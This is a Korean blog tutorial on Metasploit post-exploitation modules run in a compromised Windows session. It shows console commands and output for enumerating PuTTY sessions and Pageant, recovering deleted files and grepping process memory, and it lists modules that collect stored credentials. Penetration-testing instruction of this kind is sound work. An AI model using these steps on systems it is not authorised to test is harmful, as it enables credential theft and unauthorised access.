| | at : |


[MAD-METASPLOIT] 0x33 - Using post module 하훌 rwxr-xr-x 0 8/07/2017

[MAD-METASPLOIT] 0x33 - Using post module

Permission rw-r--r--
Author 하훌
Date and Time 8/07/2017
License 크리에이티브 커먼즈 라이선스

Post module 찾기

HAHWUL exploit(easyfilesharing_post) > search type:post platform:windows

Matching Modules

   Name                                                    Disclosure Date  Rank       Description
   ----                                                    ---------------  ----       -----------
   post/multi/gather/apple_ios_backup                                       normal     Windows Gather Apple iOS MobileSync Backup File Collection
   post/multi/gather/check_malware                                          normal     Multi Gather Malware Verifier
   post/multi/gather/dbvis_enum                                             normal     Multi Gather DbVisualizer Connections Settings
   post/multi/gather/dns_bruteforce                                         normal     Multi Gather DNS Forward Lookup Bruteforce
   post/multi/gather/dns_reverse_lookup                                     normal     Multi Gather DNS Reverse Lookup Scan
   post/multi/gather/dns_srv_lookup                                         normal     Multi Gather DNS Service Record Lookup Scan
   post/multi/gather/enum_vbox                                              normal     Multi Gather VirtualBox VM Enumeration
   post/multi/gather/env                                                    normal     Multi Gather Generic Operating System Environment Settings
   post/multi/gather/filezilla_client_cred                                  normal     Multi Gather FileZilla FTP Client Credential Collection
   post/multi/gather/find_vmx                                               normal     Multi Gather VMWare VM Identification
   post/multi/gather/firefox_creds                                          normal     Multi Gather Firefox Signon Credential Collection
   post/multi/gather/jboss_gather                                           normal     Jboss Credential Collector
   post/multi/gather/lastpass_creds                                         normal     LastPass Vault Decryptor
   post/multi/gather/multi_command                                          normal     Multi Gather Run Shell Command Resource File
   post/multi/gather/pgpass_creds                                           normal     Multi Gather pgpass Credentials
   post/multi/gather/pidgin_cred                                            normal     Multi Gather Pidgin Instant Messenger Credential Collection
   post/multi/gather/ping_sweep                                             normal     Multi Gather Ping Sweep
   post/multi/gather/resolve_hosts                                          normal     Multi Gather Resolve Hosts
   post/multi/gather/run_console_rc_file                                    normal     Multi Gather Run Console Resource File
   post/multi/gather/skype_enum                                             normal     Multi Gather Skype User Data Enumeration

putty sessions 찾기


HAHWUL exploit(easyfilesharing_post) > use post/windows/gather/enum_putty_saved_sessions
HAHWUL post(enum_putty_saved_sessions) > show options

Module options (post/windows/gather/enum_putty_saved_sessions):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

HAHWUL post(enum_putty_saved_sessions) > run
[-] Post failed: Msf::OptionValidateError The following options failed to validate: SESSION.
HAHWUL post(enum_putty_saved_sessions) > set SESSION 2
HAHWUL post(enum_putty_saved_sessions) > run

[*] Looking for saved PuTTY sessions
[-] No saved sessions found

[*] Looking for previously stored SSH host key fingerprints
[-] No stored SSH host keys found

[*] Looking for Pageant...
[+] Pageant is running (Handle 0x0)
[*] Post module execution completed

   post/windows/gather/forensics/browser_history                            normal     Windows Gather Skype, Firefox, and Chrome Artifacts
   post/windows/gather/forensics/duqu_check                                 normal     Windows Gather Forensics Duqu Registry Check
   post/windows/gather/forensics/enum_drives                                normal     Windows Gather Physical Drives and Logical Volumes
   post/windows/gather/forensics/imager                                     normal     Windows Gather Forensic Imaging
   post/windows/gather/forensics/nbd_server                                 normal     Windows Gather Local NBD Server
   post/windows/gather/forensics/recovery_files                             normal     Windows Gather Deleted Files Enumeration and Recovering

파일 복구 관련 Module

HAHWUL post(driver_loader) > use  post/windows/gather/forensics/recovery_files
HAHWUL post(recovery_files) > show options

Module options (post/windows/gather/forensics/recovery_files):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   DRIVE    C:               yes       Drive you want to recover files from.
   FILES                     no        ID or extensions of the files to recover in a comma separated way. Let empty to enumerate deleted files.
   SESSION                   yes       The session to run this module on.
   TIMEOUT  3600             yes       Search timeout. If 0 the module will go through the entire $MFT.

HAHWUL post(recovery_files) > set SESSION 2
HAHWUL post(recovery_files) > run

[*] System Info - OS: Windows 7 (Build 7601, Service Pack 1)., Drive: C:
[*] $MFT is made up of 1 dataruns
[*] Searching deleted files in data run 1 ...

Memory grep


HAHWUL post(recovery_files) > use post/windows/gather/memory_grep
HAHWUL post(memory_grep) > show options

Module options (post/windows/gather/memory_grep):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HEAP     false            no        Grep from heap
   PROCESS                   yes       Name of the process to dump memory from
   REGEX                     yes       Regular expression to search for with in memory
   SESSION                   yes       The session to run this module on.



Recent Post

0 개의 댓글:

댓글 쓰기